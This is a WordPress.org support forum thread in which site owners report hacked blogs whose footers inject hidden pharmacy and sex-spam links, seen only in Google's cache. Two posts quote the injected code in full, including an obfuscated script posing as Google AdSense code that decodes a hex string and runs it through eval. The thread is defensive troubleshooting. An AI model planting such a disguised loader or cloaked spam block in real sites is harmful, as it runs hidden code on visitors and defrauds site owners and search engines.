WordPress.org

Ready to get started?Download WordPress

Forums

WP hacked, Ads added to Google cache (8 posts)

  1. stml
    Member
    Posted 5 years ago #

    I just discovered that the Google result for my site http://londonlitplus.com includes hidden spam that is not visible to regular browsing.

    It appears to be added in with the wp_footer() anchor, and as I'm not using this, I've removed it from my theme, which will hopefully stop it immediately (only becoming effective when Google recaches my site though), but I'm assuming it's still there in my core files (I'm using only a couple of reputable plugins).

    I did try spoofing my sit with a Googlebot user-agent, which, while definitely working, did not show up the spam.

    I upgraded all my core files to 2.5.1 only a few weeks ago, so I'm assuming this has happened since then, although I can't be sure. I can't find where it's coming from, but I'd sure like to.

    I've found references to this problem elsewhere, although the hole - files chmodded to 777 - is not the problem here.

    Has anyone else experienced this? Is there a known problem and/or solution?

    This is what was being added in my footer:

    <div id="_wp_footer"><a href="http://www.foresight.org/nanodot/?res=0" title="Acyclovir">Acyclovir</a>
    <a href="http://www.foresight.org/nanodot/?res=1" title="Adderall">Adderall</a>
    ... Many more similar ...
    <a href="http://www.foresight.org/nanodot/?res=97" title="Brahmi">Brahmi</a>
    <a href="http://www.foresight.org/nanodot/?res=98" title="Brite">Brite</a>
    <a href="http://www.foresight.org/nanodot/?res=99" title="Buspar">Buspar</a>
    </div>
    <script type="text/javascript"><!--
    google_ad_client = "pub-7652328300112263";
    google_ad_width = 728;
    google_ad_height = 15;
    google_ad_format = "728x15_0ads_al_s";
    google_ad_channel = "";
    function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);}
    google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E455C544248504F53434F0304084C4C50423A02373B44403B2F4609ED3838362CE800");
    //-->
    </script>
  2. bastienb
    Member
    Posted 5 years ago #

    Hi,
    I just encoutered the same thing. Here is what I have in the google cache :

    <div id="_wp_footer">
    ...
    
    A lot of link to get your cock longer and stronger...
    
    ...
    </div>
    
    <script type="text/javascript"><!--
    google_ad_client = "pub-7652328300112263";
    google_ad_width = 728;
    google_ad_height = 15;
    google_ad_format = "728x15_0ads_al_s";
    google_ad_channel = "";
    function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);}
    google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E455C544248504F53434F0304084C4C50423A02373B44403B2F4609ED3838362CE800");
    //-->
    </script>

    I saw the the same call to the function wp_footer(); at the end of all the footer.php hosted in the wp-content directory but I don't have this call in my local saves so I believe it has been modified on server side.

    This is the second time I have this problem, last time I was banned from google for SPAM reason, this time, I saw it before the ban because of my stats (all google referer was redirect to spam sites).

    I'm sure that this is a wordpress problem, my server is safe, it does not have any HTTP access to external web sites so I'm sure this hack has been done by injection !

    I'm using WP 2.5.1 and 3 plugins updates (cformsII, WP-polls and Akismet).

    Actually, I have delete all default themes from the wp-content directory and let only the one I use and put it in read only but I don't think this is the only one solution.

    Please answer to us, it could help.

    Regards,
    Bastien.

  3. Joni
    Member
    Posted 5 years ago #

    That sounds like a spammy *theme* to me, both of you guys. And rest assured, it is NOT the default theme that is stinking up the pond. Can each of you tell me what theme you were using when this spam appeared?

  4. bastienb
    Member
    Posted 5 years ago #

    I'm using a theme from Abhishek Tripathi, the theme name is YourBlog2.0 but I did a lot of changes on this but I don't think the theme is the problem.

    You can see it here : http://www.culture-generale.fr

    Does the wp_footer() function should be in the default WP themes ?

  5. Joni
    Member
    Posted 5 years ago #

    Look in the theme files and see if there is a file called functions.php and see if it calls wp_footer() .. which is a legitimate function most of the time, except when unscrupulous theme designers insert spam into the mix.

  6. stml
    Member
    Posted 5 years ago #

    wp_footer() is completely legitimate. I was using a custom theme, but always leave wp_footer() in in case it is required at some point.

    While it wasn't in this case, and I could remove it, the problem is not with wp_footer() but the malicious code that was being inserted by it, and working out where this code is, and how it got there, is the primary concern.

  7. stml
    Member
    Posted 5 years ago #

    To clarify, this has nothing to do with the theme in use.

  8. bastienb
    Member
    Posted 5 years ago #

    Hi stlm,

    I have search for informations about this hack and I found something interesting to see the way we have been infected.

    This is not related at all with the used theme as everyone say here but it's an old exploit of WP that maybe we always have in our files and databases since the migrations !

    See the article here : http://linux.byexamples.com/archives/397/wordpress-exploit-we-been-hit-by-hidden-spam-link-injection/

    I have see and delete everything the author says and I think I'm safe now !

    Regards,
    Bastien.

Topic Closed

This topic has been closed to new replies.

About this Topic